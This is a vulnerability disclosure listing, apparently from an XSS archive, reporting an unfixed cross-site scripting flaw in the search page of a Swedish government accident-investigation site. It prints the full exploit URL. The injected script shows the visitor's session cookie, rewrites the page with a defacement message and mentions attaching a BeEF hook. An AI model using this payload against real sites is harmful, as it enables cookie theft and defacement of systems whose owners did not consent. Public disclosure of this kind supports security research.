Security researcher DellNull, has submitted on 15/05/2009 a cross-site-scripting (XSS) vulnerability affecting www.havkom.se, which at the time of submission ranked 7162581 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 11/06/2009. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
| Date submitted: 15/05/2009 |
Date published: 11/06/2009 |
Fixed? Mail us! | Status:  UNFIXED |
| Author: DellNull |
Domain: www.havkom.se |
Category: XSS |
Pagerank: 7162581 |
|---|
URL: http://www.havkom.se/textsearch.asp?SearchText=%3CSCRIPT%3E%3C/SCRIPT%3E%3CSCRIPT%3Ealert(%27This%20
is%20a%20cookie%20from%20the%20Swedish%20Accident%20Investigation%20Team!\n%27+document.cookie);%3C/
SCRIPT%3E%3Ch1%3E%3Cfont%20color=%22red%22%20size=%22+5%22%3EAccident%20Investigation%20Team!%3Cbr%3
EInvestigate%20this!!!%20,%20see%20%3Ca%20href%20=%27http://xssed.com/search?key=havkom.se%27%3Ehttp
://xssed.com/search?key=havkom.se%3C/a%3E%20It%27s%20a%20shame%20that%20a%20government%20authority%2
0is%20prone%20to%20security%20flaws%20in%20their%20systems!%20What%20if%20someone%20places%20a%20xss
%20proxy%20hook%20(like%20BeEF)%20here?%20The%20privacy%20for%20swedish%20citizens%20is%20supposed%2
0to%20be%20protected%20by%20constitutional%20laws.%20So%20live%20by%20the%20law%20or%20die%20by%20th
e%20law%3Cbr%3E%3Cbr%3E-%20DellNull%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cimg%20src=%27http://www.kinetics.co.nz
/SiteCollectionImages/CrashTestDummy.jpg%27%3E%3C/font%3E%3C/script%3E |
|
Click here to view the mirror
|
|
|
| 
